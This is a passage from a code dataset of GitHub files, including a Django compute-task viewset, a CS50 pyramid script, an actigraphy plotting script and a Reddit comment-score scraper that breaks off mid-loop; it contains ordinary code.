CharFilter(field_name=\"function__key\", distinct=True, label=\"function_key\")\n duration = RangeFilter(label=\"duration\")\n\n class Meta:\n model = ComputeTask\n fields = {\n \"key\": [\"exact\"],\n \"owner\": [\"exact\"],\n \"rank\": [\"exact\"],\n \"worker\": [\"exact\"],\n \"tag\": [\"exact\"],\n }\n filter_overrides = {\n models.CharField: {\n \"filter_class\": BaseInFilter,\n \"extra\": lambda f: {\n \"lookup_expr\": \"in\",\n },\n },\n models.IntegerField: {\n \"filter_class\": BaseInFilter,\n \"extra\": lambda f: {\n \"lookup_expr\": \"in\",\n },\n },\n models.UUIDField: {\n \"filter_class\": BaseInFilter,\n \"extra\": lambda f: {\n \"lookup_expr\": \"in\",\n },\n },\n }\n\n\nclass InputAssetFilter(FilterSet):\n kind = ChoiceInFilter(field_name=\"asset_kind\", choices=FunctionInput.Kind.choices)\n identifier = CharInFilter(field_name=\"task_input__identifier\")\n\n class Meta:\n model = ComputeTaskInputAsset\n fields = [\"kind\", \"identifier\"]\n\n\nclass OutputAssetFilter(FilterSet):\n kind = ChoiceInFilter(field_name=\"asset_kind\", choices=FunctionOutput.Kind.choices)\n identifier = CharInFilter(field_name=\"task_output__identifier\")\n\n class Meta:\n model = ComputeTaskOutputAsset\n fields = [\"kind\", \"identifier\"]\n\n\nclass ComputeTaskViewSetConfig:\n filter_backends = (ComputePlanKeyOrderingFilter, MatchFilter, DjangoFilterBackend, ComputeTaskMetadataFilter)\n ordering_fields = [\n \"creation_date\",\n \"start_date\",\n \"end_date\",\n \"key\",\n \"owner\",\n \"rank\",\n \"status\",\n \"function__name\",\n \"tag\",\n \"compute_plan_key\",\n \"duration\",\n ]\n ordering = [\"creation_date\", \"key\"]\n pagination_class = DefaultPageNumberPagination\n search_fields = (\"key\",)\n filterset_class = ComputeTaskFilter\n\n\nclass ComputeTaskViewSet(ComputeTaskViewSetConfig, mixins.RetrieveModelMixin, mixins.ListModelMixin, GenericViewSet):\n serializer_class = ComputeTaskSerializer\n\n @action(methods=[\"post\"], detail=False, url_name=\"bulk_create\")\n def bulk_create(self, request, *args, **kwargs):\n return task_bulk_create(request)\n\n @action(detail=True, url_name=\"input_assets\")\n def input_assets(self, request, pk):\n input_assets = ComputeTaskInputAsset.objects.filter(task_input__task_id=pk).order_by(\n \"task_input__identifier\", \"task_input__position\"\n )\n input_assets = InputAssetFilter(request.GET, queryset=input_assets).qs\n\n context = {\"request\": request}\n page = self.paginate_queryset(input_assets)\n if page is not None:\n serializer = ComputeTaskInputAssetSerializer(page, many=True, context=context)\n return self.get_paginated_response(serializer.data)\n\n serializer = ComputeTaskInputAssetSerializer(input_assets, many=True, context=context)\n return ApiResponse(serializer.data)\n\n @action(detail=True, url_name=\"output_assets\")\n def output_assets(self, request, pk):\n output_assets = ComputeTaskOutputAsset.objects.filter(task_output__task_id=pk).order_by(\n \"task_output__identifier\"\n )\n output_assets = OutputAssetFilter(request.GET, queryset=output_assets).qs\n\n context = {\"request\": request}\n page = self.paginate_queryset(output_assets)\n if page is not None:\n serializer = ComputeTaskOutputAssetSerializer(page, many=True, context=context)\n return self.get_paginated_response(serializer.data)\n\n serializer = ComputeTaskOutputAssetSerializer(output_assets, many=True, context=context)\n return ApiResponse(serializer.data)\n\n def get_queryset(self):\n return (\n ComputeTask.objects.filter(channel=get_channel_name(self.request))\n 
.select_related(\"function\")\n .prefetch_related(\"inputs\", \"outputs\", \"function__inputs\", \"function__outputs\")\n .annotate(\n # Using 0 as default value instead of None for ordering purpose, as default\n # Postgres behavior considers null as greater than any other value.\n duration=models.Case(\n models.When(start_date__isnull=True, then=0),\n default=Extract(Coalesce(\"end_date\", Now()) - models.F(\"start_date\"), \"epoch\"),\n )\n )\n )\n\n\nclass CPTaskViewSet(ComputeTaskViewSetConfig, mixins.ListModelMixin, GenericViewSet):\n serializer_class = ComputeTaskSerializer\n\n def get_queryset(self):\n compute_plan_key = self.kwargs.get(\"compute_plan_pk\")\n validate_key(compute_plan_key)\n\n return (\n ComputeTask.objects.filter(channel=get_channel_name(self.request))\n .filter(compute_plan__key=compute_plan_key)\n .select_related(\"function\")\n .prefetch_related(\"function__inputs\", \"function__outputs\", \"inputs\", \"outputs\")\n .annotate(\n # Using 0 as default value instead of None for ordering purpose, as default\n # Postgres behavior considers null as greater than any other value.\n duration=models.Case(\n models.When(start_date__isnull=True, then=0),\n default=Extract(Coalesce(\"end_date\", Now()) - models.F(\"start_date\"), \"epoch\"),\n )\n )\n )\n","repo_name":"Substra/substra-backend","sub_path":"backend/api/views/computetask.py","file_name":"computetask.py","file_ext":"py","file_size_in_byte":11538,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"61"} +{"seq_id":"74179504514","text":"from functools import partial as _partial\nimport typing as _t\n\n\ndef instance_of(*types: type) -> _t.Callable[[_t.Any], bool]:\n \"\"\"\n Creates predicate that checks if object is instance of given types.\n\n >>> is_any_string = instance_of(str, bytes, bytearray)\n >>> is_any_string(b'')\n True\n >>> is_any_string('')\n True\n >>> is_any_string(1)\n False\n \"\"\"\n non_types = [candidate\n for candidate in types\n if not isinstance(candidate, type)]\n if non_types:\n raise TypeError(non_types)\n return _partial(_is_instance_of,\n types=types)\n\n\ndef subclass_of(*types: type) -> _t.Callable[[type], bool]:\n \"\"\"\n Creates predicate that checks if type is subclass of given types.\n\n >>> is_metaclass = subclass_of(type)\n >>> is_metaclass(type)\n True\n >>> is_metaclass(object)\n False\n \"\"\"\n non_types = [candidate\n for candidate in types\n if not isinstance(candidate, type)]\n if non_types:\n raise TypeError(non_types)\n return _partial(_is_subclass_of,\n types=types)\n\n\ndef _is_instance_of(value: _t.Any, types: _t.Tuple[type, ...]) -> bool:\n return isinstance(value, types)\n\n\ndef _is_subclass_of(value: type, types: _t.Tuple[type, ...]) -> bool:\n return issubclass(value, types)\n","repo_name":"lycantropos/lz","sub_path":"lz/typology.py","file_name":"typology.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"18541308037","text":"from cs50 import get_int\n\n\nwhile True:\n n = get_int('Height: ')\n\n # Wait for corret input\n if n in range(1, 9):\n # Print the pyramid\n for x in range(1, n + 1):\n print((' ' * (n - x)) + ('#' * x) + ' ' + ('#' * x))\n quit()\n","repo_name":"cbraissant/cs50","sub_path":"pset6/mario/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23969633890","text":"from 
tkinter import *\nfrom PIL import Image, ImageTk\nfrom tkinter.ttk import *\nimport tkinter as tk\n\nroot = tk.Tk()\nroot.geometry(\"320x240\")\nroot.title(\"Cash Safe\")\n\n\n\n# Root background info\nlight_blue = (84, 140, 230)\ncolor_string = \"#%02x%02x%02x\" % light_blue\ncanvas = tk.Canvas(root, bg=color_string, width=320, height=240)\ncanvas.pack(expand=True)\n\n#Coin info\ncoin1 = canvas.create_oval(50, 50, 100, 100, fill=\"gold\", outline=\"yellow\")\ncoin2 = canvas.create_oval(20, 20, 100, 100, fill=\"gold\")\ncoin3 = canvas.create_oval(50, 50, 100, 100, fill=\"gold\")\n#coin1.place(padx=50, pady=20)\n\nroot.mainloop()\n","repo_name":"Idanlau/TheftDetection","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2452670900","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib.lines import Line2D\nimport datetime\n\ndef plot_data(df, fig_title):\n dates_list = df['Date'].unique().tolist()\n print(dates_list, len(dates_list), type(dates_list))\n\n fig, axes = plt.subplots(nrows=3, ncols=3, subplot_kw={'ylim': (0,250)})\n fig.canvas.set_window_title(fig_title)\n fig.suptitle(fig_title, fontsize=16)\n row=0\n col=0\n for day_now, day_next in zip(dates_list, dates_list[1:]):\n df_night_part0 = df.loc[(df['Date']==day_now) & (df[' Time']>='22:00:00'), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n df_night_part1 = df.loc[(df['Date']==day_next) & (df[' Time']<='10:00:00'), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n\n df_night = pd.concat([df_night_part0, df_night_part1], ignore_index=True) \n\n df_night.plot(x=' Time', y='Vector Magnitude', title='', ax=axes[row,col])\n col+=1\n if col==3:\n col=0\n row+=1\n else:\n pass\n \n return\n\n\ndef getSelectedData(df, time0, time1, same_day):\n\n dates_list = df['Date'].unique().tolist()\n print(dates_list, len(dates_list), type(dates_list))\n\n names_columns = df.columns.tolist()\n names_columns.append('night')\n\n # print(names_columns)\n\n # empty dataframe initialization\n df_all = pd.DataFrame(columns=names_columns)\n\n cont_nights=0\n if same_day==False:\n for day_now, day_next in zip(dates_list, dates_list[1:]):\n df_night_part0 = df.loc[(df['Date']==day_now) & (df[' Time']>=time0), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n df_night_part1 = df.loc[(df['Date']==day_next) & (df[' Time']<=time1), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n\n df_night = pd.concat([df_night_part0,df_night_part1], ignore_index=True)\n df_night['night']=cont_nights\n # print('night number ', cont_nights)\n # print(df_night.info())\n # print(df_night.head)\n cont_nights+=1\n\n # adding a column number of nights\n\n df_all=pd.concat([df_all, df_night], ignore_index=True)\n # print(df_all.info())\n # print(df_all.head)\n else:\n for day_now in dates_list:\n df_night = df.loc[(df['Date']==day_now) & (df[' Time']>=time0) & (df[' Time']<=time1), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n # df_night_part1 = df.loc[(df['Date']==day_next) & (df[' Time']<=time1), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n\n # df_night = df_night_part0.append(df_night_part1)\n df_night['night']=cont_nights\n # print('night number ', cont_nights)\n # print(df_night.info())\n # print(df_night.head)\n cont_nights+=1\n\n # adding a column number of nights\n\n 
df_all=pd.concat([df_all, df_night], ignore_index=True)\n # print(df_all.info())\n # print(df_all.head)\n\n return df_all \n\n\ndef plot_nights(df1,df2):\n nights_list = df1['night'].unique().tolist()\n # print('nights: ', nights_list)\n fig, axes = plt.subplots(nrows=2, ncols=1)\n # fig.suptitle('Vector Magnitude', fontsize=12)\n # fig.subplots_adjust(wspace=0, hspace=10)\n # fig, axes = plt.subplots(subplot_kw={'ylim': (0,150)})\n\n ax1 = axes[0]\n # ax1.set_ylabel('counts')\n # ax1.set_xlabel('')\n # ax1.set_ylim(0, 200)\n # ax1.legend([\"chest\"])\n\n ax2 = axes[1]\n # ax2.set_ylabel('counts')\n # ax2.set_ylim(0, 200)\n # ax2.legend([\"thigh\"])\n\n\n for night_num in nights_list[:1]:\n df1_night = df1.loc[(df1['night']==night_num), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n df2_night = df2.loc[(df2['night']==night_num), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n\n print('length column Time:', len(df1_night[' Time']))\n xmin = 0 \n xmax = len(df1_night[' Time'])\n\n # presenting xticks in hh:mm format\n xdelta = 3600 # seconds in one hour\n xticks = np.arange(xmin,xmax,xdelta)\n hours = np.floor(xticks/3600).astype(int)\n mins = np.floor(np.remainder(xticks,3600)/60).astype(int)\n xlabels = [str(i)+':'+str(j) for i, j in zip(hours, mins)]\n xlabels_2 = xlabels.copy()\n xlabels_2[0] = xlabels[0]+'\\n22h00'\n xlabels_2[-1] = xlabels[-1]+'\\n10h00'\n print(hours)\n print(mins)\n print(xlabels)\n # xlabels = np.around(xrange/3600,decimals=2)\n ymin = 0\n ymax = 210\n ylabel = 'counts (1s epoch)'\n xlabel = 'time (hh:mm)'\n # bx1=df1_night.plot(x=' Time', y='Vector Magnitude', ax=ax1, alpha=1.0, xlabel='', xticks=(np.arange(0, len(df1_night[' Time'])+1, 3600)))\n bx1=df1_night.plot(x=' Time', y='Vector Magnitude', ax=ax1, alpha=1.0)\n bx1.set_xlim([xmin, xmax])\n bx1.set_ylim([ymin, ymax])\n bx1.set_xticks(xticks)\n bx1.set_xticklabels(xlabels)\n bx1.set_ylabel(ylabel)\n bx1.set_xlabel('')\n bx1.set_title(\"Vector Magnitude\")\n bx1.legend([\"chest\"])\n # bx1.set_xticklabels(np.arange(0, len(df1_night[' Time'])+1, 3600))\n \n # print([xlabels[0]+'\\n22h00', xlabels[1:-1], xlabels[-1]+'\\n10h00'])\n # bx1.xlabel('')\n bx2=df2_night.plot(x=' Time', y='Vector Magnitude', ax=ax2, alpha=1.0)\n bx2.set_xlim([xmin, xmax])\n bx2.set_ylim([ymin, ymax])\n bx2.set_xticks(xticks)\n bx2.set_xticklabels(xlabels_2)\n bx2.set_ylabel(ylabel)\n bx2.set_xlabel(xlabel)\n bx2.legend([\"thigh\"])\n # bx2.set_title(\"Vector Magnitude : Thigh\")\n\n # bx2.set_xticks(np.arange(0, 12, step=0.2), np.arange(0, 12, step=0.2))\n # xticks(np.arange(0, 1, step=0.2))\n # bx2.xlabel('Time (h)')\n # bx1=df1_night.plot(x=' Time', y='Vector Magnitude', alpha=0.5, ax=axes, label='chest')\n # bx1.legend([\"chest\"])\n # bx2=df2_night.plot(x=' Time', y='Vector Magnitude', alpha=0.5, ax=axes, label='thigh')\n # bx2.legend([\"thigh\"])\n # df_night.plot(x=' Time', y='Vector Magnitude', , ax=axes[row,col])\n return\n\n# def plot_nights_2(df1,df2):\n# nights_list = df1['night'].unique().tolist()\n# # print('nights: ', nights_list)\n# fig, axes = plt.subplots(nrows=2, ncols=1, subplot_kw={'ylim': (0,250)})\n \n# ax1 = axes[0]\n# ax1.set_ylabel('counts')\n# ax1.set_ylim(0, 250)\n\n# ax2 = axes[1]\n# ax2.set_ylabel('counts')\n# ax2.set_ylim(0, 250)\n\n# for night_num in nights_list[:1]:\n# df1_night = df1.loc[(df1['night']==night_num), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n# df2_night = df2.loc[(df2['night']==night_num), ['Date',' Time',' Axis1','Axis2','Axis3','Vector 
Magnitude']]\n \n# df1_night.plot(x=' Time', y='Vector Magnitude', ax=ax1, label='magnitude (chest)')\n# df2_night.plot(x=' Time', y='Vector Magnitude', ax=ax2, label='magnitude (thigh)')\n# # df_night.plot(x=' Time', y='Vector Magnitude', , ax=axes[row,col])\n# return\n\n\ndef non_motion_periods(mag_col):\n # nights_list = df['night'].unique().tolist()\n min_value = 3\n # for night_num in nights_list[:1]:\n # mag_col = df.loc[(df['night']==night_num), ['Vector Magnitude']]\n\n mag_col['active'] = mag_col['Vector Magnitude'] > min_value\n\n active_arrray = mag_col['active'].to_numpy()\n print(active_arrray)\n changes_array = active_arrray[:-1] != active_arrray[1:]\n print(changes_array)\n idx_changes = np.flatnonzero(changes_array)\n print(idx_changes)\n # print(active_arrray[idx_changes])\n intervals = idx_changes[1:]-idx_changes[:-1]\n print(intervals)\n\n initial_value = [idx_changes[0] + 1]\n if active_arrray[idx_changes[0]]==False:\n duration_active = intervals[::2]\n duration_inactive = np.concatenate([initial_value, intervals[1::2]])\n else:\n duration_active = np.concatenate([initial_value, intervals[1::2]])\n duration_inactive = intervals[::2]\n\n print(duration_active)\n print(duration_inactive)\n \n return duration_active, duration_inactive\n\n\n# histograms\ndef activityHistogram(activity, inactivity):\n\n # print(type(activity))\n binwidth=1\n # plt.hist(activity, bins=range(min(activity), max(activity) + binwidth, binwidth))\n # plt.hist(inactivity, bins=range(min(inactivity), max(inactivity) + binwidth, binwidth))\n plt.hist(inactivity) # density=False would make counts\n plt.ylabel('Probability')\n plt.xlabel('Data')\n\n return\n\n\n\n\n # print(mag_col.info())\n # print(mag_col.describe())\n # print(mag_col.head)\n # mag_array = mag_col.to_numpy()\n # print('vector magnitud: ', len(mag_array), mag_array[0], mag_array[0][0])\n # # find first value non-zero in the list\n # min_value = 3\n # count=0\n # while mag_array[count][0] < min_value:\n # count+=1\n # print('count: ', count)\n # ts=0\n\n \n\n# def plot_seaborn(df, fig_title):\n\n# sns.set(rc={'figure.figsize': (15, 5)}, style='white')\n# ax = sns.lineplot( data=long_df, x='date', y='value', hue='datatype')\n\n####### main function ###########\nif __name__== '__main__':\n\n # the header in line 10 of the csv file\n header_location=10\n df1 = pd.read_csv(\"../data/p00/Turner Chest1secDataTable.csv\", header=header_location, decimal=',', usecols=['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude'])\n # print(df.empty)\n # print(df.shape)\n print(df1.columns)\n print(df1.head)\n print(df1.info())\n \n df2 = pd.read_csv(\"../data/p00/Turner Thigh1secDataTable.csv\", header=header_location, decimal=',', usecols=['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude'])\n # print(df.empty)\n # print(df.shape)\n print(df2.columns)\n # print(df.head)1\n print(df2.info())\n \n \n # print(df.describe())\n # print(df['Inclinometer Off'].unique())\n # print(df['Inclinometer Off'].value_counts())\n # print(df.loc[(df['Date']=='13/12/2022'), ['Date',' Time','Vector Magnitude']])\n # print(df.loc[(df['Date']=='13/12/2022') & (df['Vector Magnitude'].isnull()), ['Date',' Time','Vector Magnitude']])\n # print(df.loc[(df['Date']=='13/12/2022') & ((df[' Axis1']>0)|(df['Axis2']>0)|(df['Axis3']>0)), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']])\n\n # print(df.loc[(df['Date']=='12/12/2022') & (df[' Time']>='22:00:00'), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']])\n # 
print(df.loc[(df['Date']=='13/12/2022') & (df[' Time']<='10:00:00'), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']])\n\n # plot_data(df1, 'chest')\n # plot_data(df2, 'thigh')\n # plt.show()\n\n time_start='22:00:00'\n time_end='10:00:00'\n same_day=False\n\n # time_start='04:45:00'\n # time_end='05:45:00'\n # same_day=True\n\n\n df_chest = getSelectedData(df1, time_start, time_end, same_day)\n df_thigh = getSelectedData(df2, time_start, time_end, same_day)\n # print(df1_nights.columns)\n # print(df1_nights.info())\n # print(df1_nights.head)\n\n plot_nights(df_chest, df_thigh)\n plt.show()\n\n\n\n # plt.figure(1)\n # nights_list = df_chest['night'].unique().tolist()\n # for night_num in nights_list[:1]:\n # mag_col = df_chest.loc[(df_chest['night']==night_num), ['Vector Magnitude']]\n # activity, inactivity = non_motion_periods(mag_col)\n # plt.subplot(211)\n # activityHistogram(activity, inactivity)\n\n # nights_list = df_thigh['night'].unique().tolist()\n # for night_num in nights_list[:1]:\n # mag_col = df_thigh.loc[(df_thigh['night']==night_num), ['Vector Magnitude']]\n # activity, inactivity = non_motion_periods(mag_col)\n # plt.subplot(212)\n # activityHistogram(activity, inactivity)\n\n # plt.show()\n\n\n\n # fig, axes = plt.subplots(nrows=3, ncols=3, subplot_kw={'ylim': (0,250)})\n\n # # df_one_day = df.loc[(df['Date']=='13/12/2022') & ((df[' Axis1']>0)|(df['Axis2']>0)|(df['Axis3']>0)), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n # row=0\n # col=0\n # for date in dates_list:\n # # date_0 = '12/12/2022'\n # # date_1 = '13/12/2022'\n # # date_2 = '14/12/2022'\n # # date_3 = '15/12/2022'\n\n # df_day = df.loc[(df['Date']==date), [' Time','Vector Magnitude']]\n # # df_day_0 = df.loc[(df['Date']==date_0), [' Time','Vector Magnitude']]\n # # df_day_1 = df.loc[(df['Date']==date_1), [' Time','Vector Magnitude']]\n # # df_day_2 = df.loc[(df['Date']==date_2), [' Time','Vector Magnitude']]\n # # df_day_3 = df.loc[(df['Date']==date_3), [' Time','Vector Magnitude']]\n # df_day.plot(x=' Time', y='Vector Magnitude', title='', ax=axes[row,col])\n # # df_day_0.plot(x=' Time', y='Vector Magnitude', title='Day '+ date_0, ax=axes[0,0])\n # # df_day_1.plot(x=' Time', y='Vector Magnitude', title='Day '+ date_1, ax=axes[0,1])\n # # df_day_2.plot(x=' Time', y='Vector Magnitude', title='Day '+ date_2, ax=axes[1,0])\n # # df_day_3.plot(x=' Time', y='Vector Magnitude', title='Day '+ date_3, ax=axes[1,1])\n # col+=1\n # if col==3:\n # col=0\n # row+=1\n\n\n # plt.show()\n\n # print(df.loc[df['Date']=='13/12/2022',['Time']])\n","repo_name":"gtibap/actigraph_hscm","sub_path":"scripts/read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":13408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70589084995","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom matplotlib.animation import FuncAnimation\nfrom tqdm import tqdm\n\nATTRS = ['divinity', 'thwackability', 'moxie',\n 'musclitude', 'patheticism', 'martyrdom', 'tragicness', 'buoyancy',\n 'unthwackability', 'ruthlessness', 'overpowerment', 'shakespearianism',\n 'suppression', 'laserlikeness', 'continuation', 'base_thirst',\n 'indulgence', 'ground_friction', 'omniscience', 'tenaciousness',\n 'watchfulness', 'anticapitalism', 'chasiness']\n\nTEAM_IDS = list(reversed([\n \"b72f3061-f573-40d7-832a-5ad475bd7909\", # Lovers\n \"878c1bf6-0d21-4659-bfee-916c8314d69c\", # Tacos\n 
\"b024e975-1c4a-4575-8936-a3754a08806a\", # Steaks\n \"adc5b394-8f76-416d-9ce9-813706877b84\", # Breath Mints\n \"ca3f1c8c-c025-4d8e-8eef-5be6accbeb16\", # Firefighters\n \"bfd38797-8404-4b38-8b82-341da28b1f83\", # Shoe Thieves\n \"3f8bbb15-61c0-4e3f-8e4a-907a5fb1565e\", # Flowers\n \"979aee4a-6d80-4863-bf1c-ee1a78e06024\", # Fridays\n \"7966eb04-efcc-499b-8f03-d13916330531\", # Magic\n \"36569151-a2fb-43c1-9df7-2df512424c82\", # Millennials\n \"8d87c468-699a-47a8-b40d-cfb73a5660ad\", # Crabs\n \"23e4cbc1-e9cd-47fa-a35b-bfa06f726cb7\", # Pies\n \"f02aeae2-5e6a-4098-9842-02d2273f25c7\", # Sunbeams\n \"57ec08cc-0411-4643-b304-0e80dbc15ac7\", # Wild Wings\n \"747b8e4a-7e50-4638-a973-ea7950a3e739\", # Tigers\n \"eb67ae5e-c4bf-46ca-bbbc-425cd34182ff\", # Moist Talkers\n \"9debc64f-74b7-4ae1-a4d6-fce0144b6ea5\", # Spies\n \"b63be8c2-576a-4d6e-8daf-814f8bcea96f\", # Dale\n \"105bc3ff-1320-4e37-8ef0-8d595cb95dd0\", # Garages\n \"a37f9158-7f82-46bc-908c-c9e2dda7c33b\", # Jazz Hands\n \"c73b705c-40ad-4633-a6ed-d357ee2e2bcf\", # Lift\n \"bb4a9de5-c924-4923-a0cb-9d1445f1ee5d\", # Worms\n \"46358869-dce9-4a01-bfba-ac24fc56f57e\", # Mechanics\n \"d9f89a8a-c563-493e-9d64-78e4f9a55d4a\", # Georgias\n \"2e22beba-8e36-42ba-a8bf-975683c52b5f\", # Queens\n \"b47df036-3aa4-4b98-8e9e-fe1d3ff1894b\", # Queens\n]))\n\n\ndef main():\n data = pd.read_csv('attributes_over_time.csv')\n\n fig = plt.figure(figsize=(16, 12))\n ax = fig.add_axes([0.2, 0.025, 0.6, 0.9])\n\n prev_labels = [tid for tid in TEAM_IDS]\n\n zeros = np.zeros(len(TEAM_IDS), dtype=np.float64)\n bar_artists = [\n (attr, ax.barh(prev_labels, zeros, label=attr, left=zeros))\n for attr in ATTRS\n ]\n\n ax.set_title(\"Attributes over time\")\n ax.set_xlim((0, 21))\n\n ax.legend(bbox_to_anchor=(1.25, 1))\n title_artist = ax.text(0.5, 0.975, \"asdfasfdasdf\",\n bbox={'facecolor': 'w', 'alpha': 0.5, 'pad': 5},\n transform=ax.transAxes, ha=\"center\")\n\n def get_blitted_artists():\n return [\n *[patch\n for _, artist in bar_artists\n for patch in artist.patches],\n title_artist\n ]\n\n def func(frame_data):\n nonlocal prev_labels\n (season, day), rows = frame_data\n\n title_artist.set_text(f\"Season {season + 1} Day {day + 1}\")\n\n offsets = [0] * len(TEAM_IDS)\n for attr, bar_artist in bar_artists:\n for i, patch in enumerate(bar_artist.patches):\n width = rows[attr].get(TEAM_IDS[i], 0)\n patch.set_width(width)\n patch.set_x(offsets[i])\n offsets[i] += width\n\n labels = [\n rows['full_name'].get(team_id, \"\")\n for team_id in TEAM_IDS\n ]\n if labels != prev_labels:\n ax.set_yticklabels(labels)\n # Force a non-blit draw because blit doesn't update tick labels\n plt.draw()\n prev_labels = labels\n\n return get_blitted_artists()\n\n groups = data.set_index('team_id').groupby(['season', 'day'])\n frame_iter = tqdm(iter(groups), total=len(groups), unit='frame')\n ani = FuncAnimation(fig, func, frames=frame_iter,\n init_func=get_blitted_artists, blit=True, interval=1)\n\n ani.save(\"attributes_over_time.mp4\", fps=30)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"beiju/blaseball_analysis","sub_path":"misc/attributes_over_time.py","file_name":"attributes_over_time.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20905336588","text":"import logging\nimport sys\nimport os\nimport yaml\n\nfrom airflow.models import Variable\n\n# -------------------------------------------\n# Set up logging\n# -------------------------------------------\n\n# 
setup logging and logger\nlogging.basicConfig(format='[%(levelname)-5s][%(asctime)s][%(module)s:%(lineno)04d] : %(message)s',\n level=logging.INFO,\n stream=sys.stderr)\n\n# define logger\nlogger: logging.Logger = logging.getLogger()\nlogger.setLevel(level=logging.INFO)\n\n\ndef get_this_dir(filepath: str = __file__) -> str:\n \"\"\"helper function to return this (python) file directory\"\"\"\n return os.path.dirname(os.path.abspath(filepath))\n\n\n# -------------------------------------------\n# Load config file\n# -------------------------------------------\n\n# default config file path when running locally (not within airflow docker container)\n# get the path from airflow variables OR set it to default local path\n_default_config_path = os.path.join(get_this_dir(), '../phil_config.yaml')\nCONF_PATH = Variable.get('config_file', default_var=_default_config_path)\nconfig: dict = {}\nwith open(CONF_PATH) as open_yaml:\n config: dict = yaml.full_load(open_yaml)\n logger.info(f\"loaded configurations file: {CONF_PATH}\")\n\n\n# Set data dir path\n# ---------------------------------------------\n# default config file path when running locally (not within airflow docker container)\n# get the path from airflow variables OR set it to default local path\n_default_data_dir_path = os.path.join(get_this_dir(), '../data')\nDATA_DIR = Variable.get('data_dir', default_var=_default_data_dir_path)","repo_name":"ChloeL6/Stock-vs-Inflation","sub_path":"dsa-airflow/dags/phil_utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1620788523","text":"import praw\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#set your reddit information to enable praw\r\nreddit = praw.Reddit(client_id='',\r\n client_secret='',\r\n\t\t\t\t\t password='',\r\n user_agent='',\r\n\t\t\t\t\t username='')\r\n\r\n#top 50 subreddits\r\nlistOfSubs = ['funny' ,'AskReddit' ,'todayilearned' ,'science' ,'worldnews' ,'pics' ,'IAmA' ,'gaming' ,'videos' ,'movies' ,'aww' ,'Music' ,'blog' ,'gifs' ,'news' ,'explainlikeimfive' ,'askscience' ,'EarthPorn' ,'books' ,'television' ,'mildlyinteresting' ,'LifeProTips' ,'Showerthoughts' ,'space' ,'DIY' ,'Jokes' ,'gadgets' ,'nottheonion' ,'sports' ,'tifu' ,'food' ,'photoshopbattles' ,'Documentaries' ,'Futurology' ,'history' ,'InternetIsBeautiful' ,'dataisbeautiful' ,'UpliftingNews' ,'listentothis' ,'GetMotivated' ,'personalfinance' ,'OldSchoolCool' ,'philosophy' ,'Art' ,'nosleep' ,'WritingPrompts' ,'creepy' ,'TwoXChromosomes' ,'Fitness' ]\r\n\r\nmaxDepth = 15\r\nsuma_up = [0] * maxDepth\r\nilosc = [0] * maxDepth\r\nnumber_of_posts = 0\r\n\r\nfor sub in listOfSubs:\r\n print(sub)\r\n subreddit = reddit.subreddit(sub)\r\n top_posts = subreddit.top(time_filter='all', limit=30 )\r\n\r\n for submission in top_posts:\r\n #print(submission.title)\r\n submission.comments.replace_more(limit=0) #limit=0 so that only one batch of comments is fetched\r\n submission.comment_sort = 'best'\r\n comment_queue = submission.comments[:] # Seed with top-level; [:10] would take only the first 10\r\n while comment_queue:\r\n \tcomment = comment_queue.pop(0)\r\n \t#print(comment.author, ' ', comment.ups, ' Depth: ', comment.depth)\r\n \tsuma_up[comment.depth] += comment.ups\r\n \tilosc[comment.depth] += 1\r\n \tcomment_queue.extend(comment.replies)\r\n print(suma_up)\r\n print(ilosc)\r\n\r\nsum = np.array(suma_up)\r\nqty = np.array(ilosc)\r\nhisto = sum/qty\r\nprint(histo)\r\n\r\n\r\nfor ile in 
